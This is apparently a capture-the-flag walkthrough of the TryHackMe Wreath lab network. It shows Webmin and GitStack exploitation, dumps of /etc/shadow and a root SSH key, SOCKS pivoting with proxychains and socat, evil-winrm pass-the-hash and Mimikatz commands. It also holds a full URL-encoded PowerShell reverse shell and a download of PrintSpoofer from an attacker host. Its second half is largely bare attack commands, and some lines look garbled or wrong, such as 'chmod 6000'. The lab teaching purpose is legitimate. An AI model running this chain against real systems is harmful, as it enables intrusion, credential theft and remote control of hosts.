Complete TryHackMe Wreath Network Writeup

TryHackMe Wreath Network WriteUp

TryHackMe Wreath Network Walkthrough help you learn how to pivot through a network by compromising a public facing web machine and tunnelling your traffic to access other machines in Wreath’s network. (Streak limitation only for non-subscribed users).

Access Wreath Network

Go to https://tryhackme.com/access?type=networks and download your VPN config file.

Access Wreath Network
Access Wreath Network
Wreath Network
Wreath Network
Complete TryHackMe Wreath Network Writeup

TryHackMe Wreath Walkthrough

TryHackMe Wreath Network
TryHackMe Wreath Network

TryHackMe Wreath Network

Complete TryHackMe Wreath Network Writeup

Before starting lets create a folder to store all our files.

mkdir /home/kali/TryHackMe_Wreath

Enter the project folder:

cd /home/kali/TryHackMe_Wreath

Attacking Prod-Server

The production server is a Linux host lets use nmap to scan for open ports and verify what services are running.

Scan the Host

Scan the prod-server using nmap and verify services running on remote machine.

nmap -sC -sV --script=vuln 10.200.193.200
Complete TryHackMe Wreath Network Writeup
Complete TryHackMe Wreath Network Writeup 47

Interesting result the server is running an old WebAdmin version on port 10000.

Complete TryHackMe Wreath Network Writeup
Complete TryHackMe Wreath Network Writeup 48

Open Google and search exploit for Web Admin

search webadmin 1.890

Download Exploit from here:

WebMin-1.890-Exploit-unauthorized-RCE

Exploit WebAdmin 1.890 arguments options:

Complete TryHackMe Wreath Network Writeup

Execute the python script and verity the system process and user.

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "id;whoami"
Complete TryHackMe Wreath Network Writeup

After verify we are root let’s work to get remote access on the machine, execute the same script but now reading the /etc/passwd file:

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/passwd"
Complete TryHackMe Wreath Network Writeup

Now we have a list of system users we can use, notice the user twreath what is his password hash?

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/shadow"
Complete TryHackMe Wreath Network Writeup

Great we have two user password hashs, let’s crack them.

root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1

twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg

Save both at password_hashes.txt

Crack The Hashes

Passing the hahs file into john without more arguments john will auto detected the encryption type.

john passwds_hashes.txt

Verify if john crack any password:

john --show

No success cracking the hashes?

If it was possible to read shadow file maybe it is possible to extract the root SSH RSA private key, let’s try it!

Extract SSH Keys

Root SSH RSA Key

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /root/.ssh/id_rsa"
Complete TryHackMe Wreath Network Writeup
Complete TryHackMe Wreath Network Writeup 49

copy the key content into the file prod-server.rsa and define the correct permissions

chmod 6000 prod-server.rsa
Complete TryHackMe Wreath Network Writeup

Login In into Prod-Server

Now we can login into our production server, here I will connect throught SSH creating an socks5 proxy on port 19850. This proxy will allow us to access all networks and hosts prod-server can access.

ssh -i /home/kali/Wreath/prod-server.rsa [email protected] -D 19850
Complete TryHackMe Wreath Network Writeup
Complete TryHackMe Wreath Network Writeup

We are In as root 😀

Attack Prod-Server Descrition

We start scanning the host prod-server with nmap and detect a vulnerable version of WebAdmin running on port 10000. Then we search for a public exploit on google and use it to get a RCE on remote server, with the script we were able to extract the root SSH RSA Key and login as root into the prod-server and create a socks5 proxy.

Attacking Git Server

Its time to attack the git Server but before that let’s configure our proxychains to be able to use any tool against git-server.

If you want to use proxychains strict mode comment the socks4 entry and add only Socks5.

sudo echo "socks5 127.0.0.1 19850" >> /etc/proxychains4.conf
Complete TryHackMe Wreath Network Writeup

An SSH Proxy tunnel can give us alote of flexibility when we are pivoting inside a network we can keep a secure tunnel between our comprimised machine and access any service on the network.

Using SSH and Proxychains
Using SSH and Proxychains

If we want to access git server directly from out browser we need to setup FoxyProxy to use our new socks5 proxy created with SSH tunnel.

Complete TryHackMe Wreath Network Writeup

Now we can access the Git Server directly in our browser.

Remember any tool we use to attack the Git Server we need to use our local Socks5 proxy (127.0.0.1:19850) created with our SSH Tunnel into prod-server host.

After configuring the FoxyProxy to use our proxy open the git server IP on browser.

http://10.200.193.150

We will have an error page but notice have some juice info, it is using Django and mentioned some new directories. Let’s investigate it!

Complete TryHackMe Wreath Network Writeup
http://10.200.193.150/gitstack

Scan Git Server with Nmap

proxychains4 nmap 10.200.193.150 --top-ports 1023 -sT  -n -PS --script=vuln
Complete TryHackMe Wreath Network Writeup

As we know gitstack is running on port 80, let’s search for an exploit using searchsploit tool.

searchsploit gitstack
Complete TryHackMe Wreath Network Writeup

We found 3 possible GitStack exploits, let’s copy the third one into our current folder:

searchsploit -m php/webapps/43777.py
mv 43777.py exploit_GitStack.py
proxychains4 python exploit_GitStack.py
proxychains4 curl -X POST http://10.200.193.150/rest/user/ -d 'username=RFS;password=RFS'
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i 10.200.193.150
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Admnistrator -H 37db63-RFS-a8461e05c-RFS -i 10.200.193.150
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
firewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcp
scp -i key socat [email protected]:/tmp
./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:10.50.190.121:19851
proxychains4 curl -X POST http://10.200.193.150/web/exploit.php -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share

Send Mimikatz trough file share or SCP

privilege::debug 
token::elevate 
lsadump::sam
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=whoami'
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=net user RFS RFS /add'

Maintend

Attacking WREATH-PC

http://10.200.193.100
http://10.200.193.100/resources
Username: Thomas
Password - Crack the Hash
powershell.exe -c "(new-object
System.Net.WebClient).DownloadFile('http://10.50.190.121/PrintSpoofer64-rfs.exe','C:\xampp\htdocs\resources\uploads\PrintSpoofer64-rfs.exe')

Linux Privilege Escalation

TryHackMe Wreath Network

URLEncoder

CrackStation

PrintSpoofer64